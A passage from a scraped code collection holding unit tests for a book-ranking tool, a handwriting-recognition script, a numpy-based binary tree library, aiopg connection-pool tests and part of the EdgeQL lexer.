api_url = defaults.get_list_url(98765, ['foo-shelf'], 9, None)
_, _, path, query, _ = urlsplit(api_url)
params = parse_qs(query)
assert '98765.xml' in path
assert params['key'][0] == 'None'
assert params['shelf'][0] == 'foo-shelf'
assert params['per_page'][0] == '9'
def test_getset_key(self):
defaults = Defaults('FAKER.GTLD', 'FOO_KEY')
assert defaults.get_key() == 'FOO_KEY'
def test_get_shelf_url(self):
defaults = Defaults('http://FAKER.GLTD', 'FOO_KEY')
assert defaults.get_shelf_url() == 'http://FAKER.GLTD/shelf/list.xml?key=FOO_KEY'
```
#### File: tests/unit/test_rank.py
```python
from sorter.lib.rank import rank, score_book, get_total_ratings
class TestRank(object):
def test_rank(self, monkeypatch):
monkeypatch.setattr("sorter.lib.rank.score_book", lambda foo, bar: foo[0])
monkeypatch.setattr("sorter.lib.rank.get_total_ratings", lambda foo: 1234)
fake_data = [
(1,2,3,4,5,6,7,8,9,10,0.02),
(9,8,7,6,5,4,3,2,1,10,0.01)
]
ranked_fake_data = rank(fake_data)
assert ranked_fake_data == [
(9,8,7,6,5,4,3,2,1,10,0.01,9),
(1,2,3,4,5,6,7,8,9,10,0.02,1)
]
def test_score_book(self):
fake_data = (1,2,3,4,5,6,7,8,9,10,0.2)
foo = score_book(fake_data, 100)
assert foo == 216.0
def test_score_book_bad_year(self, monkeypatch):
logger = FAKE_LOGGER()
monkeypatch.setattr('sorter.lib.rank.LOGGER', logger)
fake_data = (1,2,3,4,5,None,7,8,9,None,0.1)
foo = score_book(fake_data, 100)
assert foo == 136.0
assert logger.called_warn == True
def test_score_book_bad_ratings(self, monkeypatch):
logger = FAKE_LOGGER()
monkeypatch.setattr('sorter.lib.rank.LOGGER', logger)
fake_data = (1,2,3,4,5,6,None,8,9,None,0.2)
foo = score_book(fake_data, 100)
assert foo == 160.0
assert logger.called_warn == True
def test_score_book_bad_avg_ratings(self, monkeypatch):
logger = FAKE_LOGGER()
monkeypatch.setattr('sorter.lib.rank.LOGGER', logger)
fake_data = (1,2,3,4,5,6,7,None,9,None,0.3)
foo = score_book(fake_data, 100)
assert foo == 0.0
assert logger.called_warn == True
def test_score_book_bad_isbn_and_year(self, monkeypatch):
logger = FAKE_LOGGER()
monkeypatch.setattr('sorter.lib.rank.LOGGER', logger)
fake_data = (1,None,3,4,5,None,7,8,9,None,0.4)
foo = score_book(fake_data, 100)
assert foo == 376.0
assert logger.called_warn == True
def test_score_book_bad_isbn_isbn13_and_year(self, monkeypatch):
logger = FAKE_LOGGER()
monkeypatch.setattr('sorter.lib.rank.LOGGER', logger)
fake_data = (1,None,None,4,5,None,7,8,9,None,0.5)
foo = score_book(fake_data, 100)
assert foo == 456.0
assert logger.called_warn == True
def test_score_book_bad_isbn_isbn13_id_and_year(self, monkeypatch):
logger = FAKE_LOGGER()
monkeypatch.setattr('sorter.lib.rank.LOGGER', logger)
fake_data = (None,None,None,4,5,None,7,8,9,None,0.6)
foo = score_book(fake_data, 100)
assert foo == 536.0
assert logger.called_warn == True
def test_get_total_ratings(self):
fake_data = [
(1,2,3,4,5,6,7,8,9),
(9,8,7,6,5,4,3,2,1)
]
fake_total = get_total_ratings(fake_data)
assert fake_total == 10
class FAKE_LOGGER(object):
def __init__(self):
self.called_warn = False
def warn(self, *arg):
self.called_warn = True
```
#### File: tests/unit/test_request_data.py
```python
from sorter.lib.request_data import read_url
from urllib2 import HTTPError
class fake_urllib(object):
def __init__(self, should_fail=False):
self.should_fail = should_fail
def urlopen(self, uri):
if self.should_fail == True:
raise HTTPError('FAKER.GTLD', 404, 'Four Oh Four', None, None)
def read(self):
return "fake body"
def close(self):
pass
class fake_logger(object):
def __init__(self):
self.msg = None
def info(self, msg, *args):
pass
def warn(self, msg, *args):
self.msg = msg.reason
class TestRequestData(object):
def test_read_url(self, monkeypatch):
monkeypatch.setattr("urllib2.urlopen", lambda foo: fake_urllib())
monkeypatch.setattr("sorter.lib.request_data.LOGGER", fake_logger())
body = read_url("fakeurl")
assert body == "fake body"
def test_read_url_404(self, monkeypatch):
faker = fake_logger()
monkeypatch.setattr("sorter.lib.request_data.urllib2", fake_urllib(True))
monkeypatch.setattr("sorter.lib.request_data.LOGGER", faker)
body = read_url("fakeurl")
assert body == None
assert faker.msg == 'Four Oh Four'
```
#### File: tests/utils/get_element.py
```python
import os
import xml.etree.ElementTree as ElementTree
def get_element(file, xpath):
xml_file = os.path.abspath(file)
with open(xml_file, 'r') as myfile:
data = myfile.read()
myfile.close()
root = ElementTree.fromstring(data)
elem = root.find(xpath)
if elem != None:
return elem.text
else:
return None
def get_file_as_string(file):
xml_file = os.path.abspath(file)
with open(xml_file, 'r') as myfile:
data = myfile.read()
myfile.close()
return data
``` |
{
"source": "1sigmoid/zeta-ml-functions",
"score": 3
} |
#### File: SimpleHTR/src/main.py
```python
from __future__ import division
from __future__ import print_function
import json
import cv2
import editdistance
from DataLoader import DataLoader, Batch
from Model import Model, DecoderType
from SamplePreprocessor import preprocess
class FilePaths:
"filenames and paths to data"
mPath = ".\\simpTrain\\handwriting\\python36_venv\\"
fnCharList = mPath + 'SimpleHTR\\model\\charList.txt'
fnAccuracy = mPath + 'SimpleHTR\\model\\accuracy.txt'
fnTrain = mPath + 'SimpleHTR\\data\\'
fnInfer = mPath + 'SimpleHTR\\data\\test.png'
fnCorpus = mPath + 'SimpleHTR\\data\\corpus.txt'
fnPic = mPath + 'SimpleHTR\\pic\\pic.png'
fnResults = mPath + 'SimpleHTR\\pic\\results.json'
fnModel = mPath + 'SimpleHTR\\model\\'
def infer(model, fnImg, printOut = False):
"recognize text in image provided by file path"
img = preprocess(cv2.imread(fnImg, cv2.IMREAD_GRAYSCALE), Model.imgSize)
batch = Batch(None, [img])
(recognized, probability) = model.inferBatch(batch, True)
if not printOut:
return recognized, probability
else:
print('Recognized:', '"' + recognized[0] + '"')
print('Probability:', probability[0])
return recognized, probability
def predict(filepath, printOut = False):
"predict"
# infer text on test image
if printOut: print(open(FilePaths.fnAccuracy).read())
model = Model(open(FilePaths.fnCharList).read(), DecoderType.BestPath, mustRestore=True, dump = False)
return infer(model, filepath, printOut)
results = predict(FilePaths.fnPic)
open(FilePaths.fnResults, 'w').write(
json.dumps({
"recognized": results[0][0],
"probability": float(results[1][0])
})
)
``` |
{
"source": "1smaa/binarytree",
"score": 3
} |
#### File: binarytree/binarytree/bt.py
```python
import pickle
import os
import random
import numpy as np
import functools
from telegram import ChosenInlineResult
def arithmetic_error_catcher(f):
@functools.wraps(f)
def func(*args, **kwargs):
if not isinstance(args[1], (binarytree.AtomicBinaryTree,)) or args[0].type != args[1].type:
raise Exception("Binary trees not compatible.")
try:
return f(*args, **kwargs)
except:
raise Exception("Impossible arithmetic operation.")
return func
def obj_arithmetic_error_catcher(f):
@functools.wraps(f)
def func(*args, **kwargs):
if not isinstance(args[1], (binarytree.ObjectBinaryTree,)) or args[0].type != args[1].type:
raise Exception("Binary trees not compatible.")
try:
return f(*args, **kwargs)
except:
raise Exception("Impossible arithmetic operation.")
return func
def conversion_error_catcher(f):
@functools.wraps(f)
def func(*args, **kwargs):
try:
return f(*args, **kwargs)
except:
raise Exception("Conversion failed.")
return func
class binarytree(object):
def delete(name):
'''Deletes a binary tree from the storage.'''
if "storage" not in os.listdir():
raise Exception("Storage directory non-existent.")
if "{}.bt".format(name) in os.listdir("storage"):
os.remove(os.path.join("storage", "{}.bt".format(name)))
else:
raise Exception("File not found.")
class __binarytree(object):
def __init__(self):
pass
def __repr__(self):
return "{name}\n{structure}".format(name=self.name if self.name else "No Name", structure=str(self._structure))
def __bool__(self):
return not self._structure.shape[0] == 0
def __len__(self):
return self._structure.shape[0]
@conversion_error_catcher
def __list__(self):
return [node[0] for node in self._structure]
def store(self, name=None):
'''Stores the binary tree inside a specified file.'''
if not name:
name = self.name if self.name else "".join(
[chr(random.randint(97, 122)) for _ in range(10)])
if "storage" not in os.listdir():
os.mkdir("storage")
with open(os.path.join("storage", "{}.bt".format(name)), "wb") as f:
pickle.dump(self._structure, f)
def load(self, name=None):
'''Loads a binary tree from a specified file.'''
self.__check_file(name)
with open(os.path.join("storage", "{}.bt".format(name)), "rb") as f:
self._structure = pickle.load(f)
if not self.name:
self.name = name
def getObject(self):
'''Returns the tree structure using a matrix.
The first column is the value of the node, the second is the first child node,
the third one the second child node.'''
return self._structure
def __check_file(self, name=None):
if not name:
if self.name:
name = self.name
else:
raise Exception("File name needed.")
if "{}.bt".format(name) not in os.listdir("storage"):
raise Exception("Binary tree file not found.")
def _check_node(self, node):
return isinstance(node, (self.type,)) and (True if self.type is not dict else "key" in node.keys())
class AtomicBinaryTree(__binarytree):
def __init__(self, name=None, key_type=int):
'''Class to create, search, store and load binary trees.
Specifically created to handle atomic data, such as strings or numbers.'''
if name:
self.name = name
self._structure = np.ndarray((0, 3), key_type)
self.type = key_type
@arithmetic_error_catcher
def __add__(self, bt):
new = [node[0] for node in bt.getObject()]
for node in new:
self.__add_node(np.asscalar(node))
return self
@arithmetic_error_catcher
def __lt__(self, bt):
return self._structure.shape(0) > bt.getObject().shape[0]
@arithmetic_error_catcher
def __gt__(self, bt):
return self._structure.shape[0] < bt.getObject().shape[0]
@arithmetic_error_catcher
def __le__(self, bt):
return self._structure.shape[0] <= bt.getObject().shape[0]
@arithmetic_error_catcher
def __ge__(self, bt):
return self._structure.shape[0] >= bt.getObject().shape[0]
@arithmetic_error_catcher
def __eq__(self, bt):
new = [node[0] for node in bt.getObject()]
old = [node[0] for node in self._structure]
return set(new) == set(old)
@arithmetic_error_catcher
def __ne__(self, bt):
new = [node[0] for node in bt.getObject()]
old = [node[0] for node in self._structure]
return set(new) != set(old)
def add_nodes(*nodes):
'''Add a finite number of nodes to the binary tree.'''
if len(nodes) < 2:
raise Exception("No node was passed to the function.")
self = nodes[0]
nodes = nodes[1:]
for node in nodes:
if not self._check_node(node):
raise Exception(
"Can't recognize the value inside the node.")
try:
self.__add_node(node)
except:
raise Exception(
"There was an error while adding the node.")
def __add_node(self, node):
if self._structure.shape[0] == 0:
self._structure = np.append(
self._structure, [[node, -1, -1]], axis=0)
return
chosenNode = 0
p = -1
while True:
if node < self._structure[chosenNode][0]:
p = 1
else:
p = 2
if self._structure[chosenNode][p] == -1:
self._structure[chosenNode][p] = self._structure.shape[0]
break
chosenNode = self._structure[chosenNode][p]
self._structure = np.append(
self._structure, [[node, -1, -1]], axis=0)
def find_nodes(*nodes):
'''Find a finite number of nodes inside the binary tree.
Returns an array with the result(s) of the research for each node.'''
if len(nodes) < 2:
raise Exception("No node was passed to the function.")
self = nodes[0]
nodes = nodes[1:]
results = []
for node in nodes:
if not self._check_node(node):
raise Exception(
"Can't recognized the value inside the node.")
try:
results.append(self.__find_node(node))
except:
raise Exception("Error while exploring the tree.")
return results if len(results) != 1 else results[0]
def __find_node(self, node):
chosenNode = self._structure[0]
while chosenNode[0] != node:
if node < chosenNode[0]:
chosenNode = self._structure[chosenNode[1]
] if chosenNode[1] != -1 else None
else:
chosenNode = self._structure[chosenNode[2]
] if chosenNode[2] != -1 else None
if chosenNode is None:
return False
return True
def empty(self):
'''Empty the binary tree.'''
self._structure = np.ndarray((0, 3), self.type)
def eliminate(self, node):
'''Eliminates a specified node from the tree and its subtree.'''
chosenNode = self._structure[0]
father, index, pos = 0, 0, 1
while chosenNode[0] != node:
father = index
pos = 1 if node < chosenNode[0] else 2
index = chosenNode[pos]
chosenNode = self._structure[chosenNode[pos]
] if chosenNode[pos] != -1 else None
if chosenNode is None:
raise Exception("Node not found.")
self._structure[father][pos] = -1
self._structure = np.delete(self._structure, index, axis=0)
def subtree(self, node):
chosenNode = self._structure[0]
pos = 0
while node != chosenNode[0]:
pos = 1 if node < chosenNode[0] else 2
chosenNode = self._structure[chosenNode[pos]
] if chosenNode[pos] != -1 else None
if chosenNode is None:
raise Exception("Node not found.")
new = binarytree.AtomicBinaryTree(
name="sub_{}".format(self.name), key_type=self.type)
self.__build(new, chosenNode)
return new
def __build(self, new, chosenNode):
new.add_nodes(chosenNode[0].item())
if chosenNode[1] != -1:
self.__build(new, self._structure[chosenNode[1]])
if chosenNode[2] != -1:
self.__build(new, self._structure[chosenNode[2]])
class ObjectBinaryTree(__binarytree):
def __init__(self, name=None):
'''Class to create, search, store and load binary trees.
Nodes must be dictionaries and include a 'key' key.'''
if name:
self.name = name
self._structure = np.ndarray((0, 3), dict)
self.type = dict
@obj_arithmetic_error_catcher
def __add__(self, bt):
if not isinstance(bt, (binarytree.ObjectBinaryTree,)) or self.type != bt.type:
raise
new = [node[0] for node in bt.getObject()]
for node in new:
self.__add_node(node)
return self
@obj_arithmetic_error_catcher
def __lt__(self, bt):
return self._structure.shape[0] > bt.getObject().shape[0]
@obj_arithmetic_error_catcher
def __gt__(self, bt):
return self._structure.shape[0] < bt.getObject().shape[0]
@obj_arithmetic_error_catcher
def __le__(self, bt):
return self._structure.shape[0] <= bt.getObject().shape[0]
@obj_arithmetic_error_catcher
def __ge__(self, bt):
return self._structure.shape[0] >= bt.getObject().shape[0]
@obj_arithmetic_error_catcher
def __eq__(self, bt):
new = [node[0] for node in bt.getObject()]
old = [node[0] for node in self._structure]
return set(new) == set(old)
@obj_arithmetic_error_catcher
def __ne__(self, bt):
new = [node[0] for node in bt.getObject()]
old = [node[0] for node in self._structure]
return set(new) != set(old)
def add_nodes(*nodes):
'''Add a finite number of nodes to the binary tree.'''
if len(nodes) < 2:
raise Exception("No node was passed to the function.")
self = nodes[0]
nodes = nodes[1:]
for node in nodes:
if not self._check_node(node):
raise Exception(
"Can't recognize the value inside the node.")
try:
self.__add_node(node)
except:
raise Exception(
"There was an error while adding the node.")
def __add_node(self, node):
if self._structure.shape[0] == 0:
self._structure = np.append(
self._structure, [[node, -1, -1]], axis=0)
return
chosenNode = self._structure[0]
p = -1
while True:
if node["key"] < chosenNode[0]["key"]:
p = 1
else:
p = 2
if chosenNode[p] == -1:
chosenNode[p] = self._structure.shape[0]
break
chosenNode = self._structure[chosenNode[p]]
self._structure = np.append(
self._structure, [[node, -1, -1]], axis=0)
def find_nodes(*keys):
'''Find a finite number of nodes inside the binary tree.
Returns an array with the result(s) of the research for each node.'''
if len(keys) < 2:
raise Exception("No node was passed to the function.")
self = keys[0]
keys = keys[1:]
results = []
for key in keys:
if not isinstance(key, (int, float, str,)):
raise Exception(
"Can't recognized the value inside the node.")
try:
results.append(self.__find_node(key))
except:
raise Exception("Error while exploring the tree.")
return results if len(results) != 1 else results[0]
def __find_node(self, key):
chosenNode = self._structure[0]
while chosenNode[0]["key"] != key:
if key < chosenNode[0]["key"]:
chosenNode = self._structure[chosenNode[1]
] if chosenNode[1] != -1 else None
else:
chosenNode = self._structure[chosenNode[2]
] if chosenNode[2] != -1 else None
if chosenNode is None:
break
return chosenNode[0] if chosenNode else None
def empty(self):
'''Empty the binary tree.'''
self._structure = np.ndarray((0, 3), dict)
def eliminate(self, node):
'''Eliminates a specified node from the tree and its subtree.'''
chosenNode = self._structure[0]
father, index, pos = 0, 0, 1
while chosenNode[0]["key"] != node:
if node < chosenNode[0]["key"]:
father = index
pos = 1
else:
father = index
pos = 2
index = chosenNode[pos]
chosenNode = self._structure[chosenNode[pos]
] if chosenNode[pos] != -1 else None
if chosenNode is None:
raise Exception("Node not found.")
self._structure[father][pos] = -1
self._structure = np.delete(self._structure, index, axis=0)
def subtree(self, node):
chosenNode = self._structure[0]
pos = 0
while node != chosenNode[0]["key"]:
pos = 1 if node < chosenNode[0]["key"] else 2
chosenNode = self._structure[chosenNode[pos]
] if chosenNode[pos] != -1 else None
if chosenNode is None:
raise Exception("Node not found.")
new = binarytree.ObjectBinaryTree(
name="sub_{}".format(self.name))
self.__build(new, chosenNode)
return new
def __build(self, new, chosenNode):
new.add_nodes(chosenNode[0])
if chosenNode[1] != -1:
self.__build(new, self._structure[chosenNode[1]])
if chosenNode[2] != -1:
self.__build(new, self._structure[chosenNode[2]])
``` |
{
"source": "1st1/aiopg",
"score": 3
} |
#### File: aiopg/tests/test_pool.py
```python
import asyncio
import unittest
from unittest import mock
from psycopg2.extensions import TRANSACTION_STATUS_INTRANS
import aiopg
from aiopg.connection import Connection, TIMEOUT
from aiopg.pool import Pool
class TestPool(unittest.TestCase):
def setUp(self):
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(None)
self.pool = None
def tearDown(self):
if self.pool is not None:
self.pool.terminate()
self.loop.run_until_complete(self.pool.wait_closed())
self.loop.close()
self.loop = None
@asyncio.coroutine
def create_pool(self, no_loop=False, **kwargs):
loop = None if no_loop else self.loop
pool = yield from aiopg.create_pool(database='aiopg',
user='aiopg',
password='<PASSWORD>',
host='127.0.0.1',
loop=loop,
**kwargs)
self.pool = pool
return pool
def test_create_pool(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool()
self.assertIsInstance(pool, Pool)
self.assertEqual(10, pool.minsize)
self.assertEqual(10, pool.maxsize)
self.assertEqual(10, pool.size)
self.assertEqual(10, pool.freesize)
self.assertEqual(TIMEOUT, pool.timeout)
self.assertFalse(pool.echo)
self.loop.run_until_complete(go())
def test_create_pool2(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool(minsize=10, maxsize=20)
self.assertIsInstance(pool, Pool)
self.assertEqual(10, pool.minsize)
self.assertEqual(20, pool.maxsize)
self.assertEqual(10, pool.size)
self.assertEqual(10, pool.freesize)
self.assertEqual(TIMEOUT, pool.timeout)
self.loop.run_until_complete(go())
def test_acquire(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool()
conn = yield from pool.acquire()
self.assertIsInstance(conn, Connection)
self.assertFalse(conn.closed)
cur = yield from conn.cursor()
yield from cur.execute('SELECT 1')
val = yield from cur.fetchone()
self.assertEqual((1,), val)
pool.release(conn)
self.loop.run_until_complete(go())
def test_release(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool()
conn = yield from pool.acquire()
self.assertEqual(9, pool.freesize)
self.assertEqual({conn}, pool._used)
pool.release(conn)
self.assertEqual(10, pool.freesize)
self.assertFalse(pool._used)
self.loop.run_until_complete(go())
def test_release_closed(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool()
conn = yield from pool.acquire()
self.assertEqual(9, pool.freesize)
yield from conn.close()
pool.release(conn)
self.assertEqual(9, pool.freesize)
self.assertFalse(pool._used)
self.assertEqual(9, pool.size)
conn2 = yield from pool.acquire()
self.assertEqual(9, pool.freesize)
self.assertEqual(10, pool.size)
pool.release(conn2)
self.loop.run_until_complete(go())
def test_bad_context_manager_usage(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool()
with self.assertRaises(RuntimeError):
with pool:
pass
self.loop.run_until_complete(go())
def test_context_manager(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool()
with (yield from pool) as conn:
self.assertIsInstance(conn, Connection)
self.assertEqual(9, pool.freesize)
self.assertEqual({conn}, pool._used)
self.assertEqual(10, pool.freesize)
self.loop.run_until_complete(go())
def test_clear(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool()
yield from pool.clear()
self.assertEqual(0, pool.freesize)
self.loop.run_until_complete(go())
def test_initial_empty(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool(minsize=0)
self.assertEqual(10, pool.maxsize)
self.assertEqual(0, pool.minsize)
self.assertEqual(0, pool.size)
self.assertEqual(0, pool.freesize)
with (yield from pool):
self.assertEqual(1, pool.size)
self.assertEqual(0, pool.freesize)
self.assertEqual(1, pool.size)
self.assertEqual(1, pool.freesize)
conn1 = yield from pool.acquire()
self.assertEqual(1, pool.size)
self.assertEqual(0, pool.freesize)
conn2 = yield from pool.acquire()
self.assertEqual(2, pool.size)
self.assertEqual(0, pool.freesize)
pool.release(conn1)
self.assertEqual(2, pool.size)
self.assertEqual(1, pool.freesize)
pool.release(conn2)
self.assertEqual(2, pool.size)
self.assertEqual(2, pool.freesize)
self.loop.run_until_complete(go())
def test_parallel_tasks(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool(minsize=0, maxsize=2)
self.assertEqual(2, pool.maxsize)
self.assertEqual(0, pool.minsize)
self.assertEqual(0, pool.size)
self.assertEqual(0, pool.freesize)
fut1 = pool.acquire()
fut2 = pool.acquire()
conn1, conn2 = yield from asyncio.gather(fut1, fut2,
loop=self.loop)
self.assertEqual(2, pool.size)
self.assertEqual(0, pool.freesize)
self.assertEqual({conn1, conn2}, pool._used)
pool.release(conn1)
self.assertEqual(2, pool.size)
self.assertEqual(1, pool.freesize)
self.assertEqual({conn2}, pool._used)
pool.release(conn2)
self.assertEqual(2, pool.size)
self.assertEqual(2, pool.freesize)
self.assertFalse(conn1.closed)
self.assertFalse(conn2.closed)
conn3 = yield from pool.acquire()
self.assertIs(conn3, conn1)
pool.release(conn3)
self.loop.run_until_complete(go())
def test_parallel_tasks_more(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool(minsize=0, maxsize=3)
fut1 = pool.acquire()
fut2 = pool.acquire()
fut3 = pool.acquire()
conn1, conn2, conn3 = yield from asyncio.gather(fut1, fut2, fut3,
loop=self.loop)
self.assertEqual(3, pool.size)
self.assertEqual(0, pool.freesize)
self.assertEqual({conn1, conn2, conn3}, pool._used)
pool.release(conn1)
self.assertEqual(3, pool.size)
self.assertEqual(1, pool.freesize)
self.assertEqual({conn2, conn3}, pool._used)
pool.release(conn2)
self.assertEqual(3, pool.size)
self.assertEqual(2, pool.freesize)
self.assertEqual({conn3}, pool._used)
self.assertFalse(conn1.closed)
self.assertFalse(conn2.closed)
pool.release(conn3)
self.assertEqual(3, pool.size)
self.assertEqual(3, pool.freesize)
self.assertFalse(pool._used)
self.assertFalse(conn1.closed)
self.assertFalse(conn2.closed)
self.assertFalse(conn3.closed)
conn4 = yield from pool.acquire()
self.assertIs(conn4, conn1)
pool.release(conn4)
self.loop.run_until_complete(go())
def test_default_event_loop(self):
asyncio.set_event_loop(self.loop)
@asyncio.coroutine
def go():
pool = yield from self.create_pool(no_loop=True)
self.assertIs(pool._loop, self.loop)
self.loop.run_until_complete(go())
def test_cursor(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool()
with (yield from pool.cursor()) as cur:
yield from cur.execute('SELECT 1')
ret = yield from cur.fetchone()
self.assertEqual((1,), ret)
self.assertTrue(cur.closed)
self.loop.run_until_complete(go())
@mock.patch("aiopg.pool.logger")
def test_release_with_invalid_status(self, m_log):
@asyncio.coroutine
def go():
pool = yield from self.create_pool()
conn = yield from pool.acquire()
self.assertEqual(9, pool.freesize)
self.assertEqual({conn}, pool._used)
cur = yield from conn.cursor()
yield from cur.execute('BEGIN')
cur.close()
pool.release(conn)
self.assertEqual(9, pool.freesize)
self.assertFalse(pool._used)
self.assertTrue(conn.closed)
m_log.warning.assert_called_with(
"Invalid transaction status on released connection: %d",
TRANSACTION_STATUS_INTRANS)
self.loop.run_until_complete(go())
def test__fill_free(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool(minsize=1)
with (yield from pool):
self.assertEqual(0, pool.freesize)
self.assertEqual(1, pool.size)
conn = yield from asyncio.wait_for(pool.acquire(),
timeout=0.5,
loop=self.loop)
self.assertEqual(0, pool.freesize)
self.assertEqual(2, pool.size)
pool.release(conn)
self.assertEqual(1, pool.freesize)
self.assertEqual(2, pool.size)
self.assertEqual(2, pool.freesize)
self.assertEqual(2, pool.size)
self.loop.run_until_complete(go())
def test_connect_from_acquire(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool(minsize=0)
self.assertEqual(0, pool.freesize)
self.assertEqual(0, pool.size)
with (yield from pool):
self.assertEqual(1, pool.size)
self.assertEqual(0, pool.freesize)
self.assertEqual(1, pool.size)
self.assertEqual(1, pool.freesize)
self.loop.run_until_complete(go())
def test_create_pool_with_timeout(self):
@asyncio.coroutine
def go():
timeout = 0.1
pool = yield from self.create_pool(timeout=timeout)
self.assertEqual(timeout, pool.timeout)
conn = yield from pool.acquire()
self.assertEqual(timeout, conn.timeout)
pool.release(conn)
self.loop.run_until_complete(go())
def test_cursor_with_timeout(self):
@asyncio.coroutine
def go():
timeout = 0.1
pool = yield from self.create_pool()
with (yield from pool.cursor(timeout=timeout)) as cur:
self.assertEqual(timeout, cur.timeout)
self.loop.run_until_complete(go())
def test_concurrency(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool(minsize=2, maxsize=4)
c1 = yield from pool.acquire()
c2 = yield from pool.acquire()
self.assertEqual(0, pool.freesize)
self.assertEqual(2, pool.size)
pool.release(c1)
pool.release(c2)
self.loop.run_until_complete(go())
def test_invalid_minsize_and_maxsize(self):
@asyncio.coroutine
def go():
with self.assertRaises(ValueError):
yield from self.create_pool(minsize=-1)
with self.assertRaises(ValueError):
yield from self.create_pool(minsize=5, maxsize=2)
self.loop.run_until_complete(go())
def test_true_parallel_tasks(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool(minsize=0, maxsize=1)
self.assertEqual(1, pool.maxsize)
self.assertEqual(0, pool.minsize)
self.assertEqual(0, pool.size)
self.assertEqual(0, pool.freesize)
maxsize = 0
minfreesize = 100
def inner():
nonlocal maxsize, minfreesize
maxsize = max(maxsize, pool.size)
minfreesize = min(minfreesize, pool.freesize)
conn = yield from pool.acquire()
maxsize = max(maxsize, pool.size)
minfreesize = min(minfreesize, pool.freesize)
yield from asyncio.sleep(0.01, loop=self.loop)
pool.release(conn)
maxsize = max(maxsize, pool.size)
minfreesize = min(minfreesize, pool.freesize)
yield from asyncio.gather(inner(), inner(),
loop=self.loop)
self.assertEqual(1, maxsize)
self.assertEqual(0, minfreesize)
self.loop.run_until_complete(go())
def test_cannot_acquire_after_closing(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool()
pool.close()
with self.assertRaises(RuntimeError):
yield from pool.acquire()
self.loop.run_until_complete(go())
def test_wait_closed(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool()
c1 = yield from pool.acquire()
c2 = yield from pool.acquire()
self.assertEqual(10, pool.size)
self.assertEqual(8, pool.freesize)
ops = []
@asyncio.coroutine
def do_release(conn):
yield from asyncio.sleep(0, loop=self.loop)
pool.release(conn)
ops.append('release')
@asyncio.coroutine
def wait_closed():
yield from pool.wait_closed()
ops.append('wait_closed')
pool.close()
yield from asyncio.gather(wait_closed(),
do_release(c1),
do_release(c2),
loop=self.loop)
self.assertEqual(['release', 'release', 'wait_closed'], ops)
self.assertEqual(0, pool.freesize)
self.loop.run_until_complete(go())
def test_echo(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool(echo=True)
self.assertTrue(pool.echo)
with (yield from pool) as conn:
self.assertTrue(conn.echo)
self.loop.run_until_complete(go())
def test_terminate_with_acquired_connections(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool()
conn = yield from pool.acquire()
pool.terminate()
yield from pool.wait_closed()
self.assertTrue(conn.closed)
self.loop.run_until_complete(go())
def test_release_closed_connection(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool()
conn = yield from pool.acquire()
conn.close()
pool.release(conn)
self.loop.run_until_complete(go())
def test_wait_closing_on_not_closed(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool()
with self.assertRaises(RuntimeError):
yield from pool.wait_closed()
self.loop.run_until_complete(go())
def test_release_terminated_pool(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool()
conn = yield from pool.acquire()
pool.terminate()
yield from pool.wait_closed()
pool.release(conn)
self.loop.run_until_complete(go())
def test_close_with_acquired_connections(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool()
yield from pool.acquire()
pool.close()
with self.assertRaises(asyncio.TimeoutError):
yield from asyncio.wait_for(pool.wait_closed(),
0.1, loop=self.loop)
self.loop.run_until_complete(go())
``` |
{
"source": "1st1/edgedb",
"score": 2
} |
#### File: parser/grammar/lexer.py
```python
import re
from edb.lang.common import lexer
from .keywords import edgeql_keywords
__all__ = ('EdgeQLLexer',)
STATE_KEEP = 0
STATE_BASE = 1
re_dquote = r'\$([A-Za-z\200-\377_][0-9]*)*\$'
Rule = lexer.Rule
class EdgeQLLexer(lexer.Lexer):
start_state = STATE_BASE
NL = 'NL'
MULTILINE_TOKENS = frozenset(('SCONST',))
RE_FLAGS = re.X | re.M | re.I
# Basic keywords
keyword_rules = [Rule(token=tok[0],
next_state=STATE_KEEP,
regexp=lexer.group(val))
for val, tok in edgeql_keywords.items()]
common_rules = keyword_rules + [
Rule(token='WS',
next_state=STATE_KEEP,
regexp=r'[^\S\n]+'),
Rule(token='NL',
next_state=STATE_KEEP,
regexp=r'\n'),
Rule(token='COMMENT',
next_state=STATE_KEEP,
regexp=r'''\#.*?$'''),
Rule(token='TURNSTILE',
next_state=STATE_KEEP,
regexp=r':='),
Rule(token='ARROW',
next_state=STATE_KEEP,
regexp=r'->'),
Rule(token='??',
next_state=STATE_KEEP,
regexp=r'\?\?'),
Rule(token='::',
next_state=STATE_KEEP,
regexp=r'::'),
# special path operators
Rule(token='.<',
next_state=STATE_KEEP,
regexp=r'\.<'),
Rule(token='.>',
next_state=STATE_KEEP,
regexp=r'\.>'),
Rule(token='OP',
next_state=STATE_KEEP,
regexp=r'''
(?: >= | <= | != | \?= | \?!=)
'''),
# SQL ops
Rule(token='self',
next_state=STATE_KEEP,
regexp=r'[,()\[\].@;:+\-*/%^<>=]'),
Rule(token='FCONST',
next_state=STATE_KEEP,
regexp=r"""
(?: \d+ (?:\.\d+)?
(?:[eE](?:[+\-])?[0-9]+)
)
|
(?: \d+\.\d+)
"""),
Rule(token='ICONST',
next_state=STATE_KEEP,
regexp=r'([1-9]\d* | 0)(?![0-9])'),
Rule(token='SCONST',
next_state=STATE_KEEP,
regexp=rf'''
(?P<Q>
# capture the opening quote in group Q
(
' | " |
{re_dquote}
)
)
(?:
(\\['"] | \n | .)*?
)
